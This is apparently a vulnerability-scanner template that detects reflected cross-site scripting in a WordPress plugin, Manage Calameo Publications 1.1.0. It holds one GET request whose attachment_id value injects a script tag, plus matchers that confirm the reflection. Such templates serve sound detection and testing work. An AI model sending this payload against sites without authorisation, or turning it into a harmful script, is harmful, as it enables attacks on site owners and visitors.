id: calameo-publications-xss info: name: WordPress Manage Calameo Publications 1.1.0 - Cross-Site Scripting author: DhiyaneshDK severity: medium description: | WordPress Manage Calameo Publications 1.1.0 is vulnerable to reflected cross-site scripting via thickbox_content.php and the attachment_id parameter. reference: - https://codevigilant.com/disclosure/wp-plugin-athlon-manage-calameo-publications-a3-cross-site-scripting-xss/ - https://wpscan.com/vulnerability/83343eb3-bb4c-4b82-adf6-745882f872cc - https://wordpress.org/plugins/athlon-manage-calameo-publications/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 metadata: verified: true max-request: 1 tags: wordpress,wp-plugin,xss,wp,wpscan http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/athlon-manage-calameo-publications/thickbox_content.php?attachment_id=id%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%26" matchers-condition: and matchers: - type: word part: body words: - 'ath_upload_calameo_publication(id\">&)' - type: word part: header words: - 'text/html' - type: status status: - 200 # digest: 4a0a0047304502204dc547b78702fabe8923a93535b726493fde993dea4ed3b1f31ae49b59873b01022100a73149409104414311d5fbde1b045403188b4e2f365b7596ec5e443049dcb2f6:922c64590222798bb761d5b6d8e72950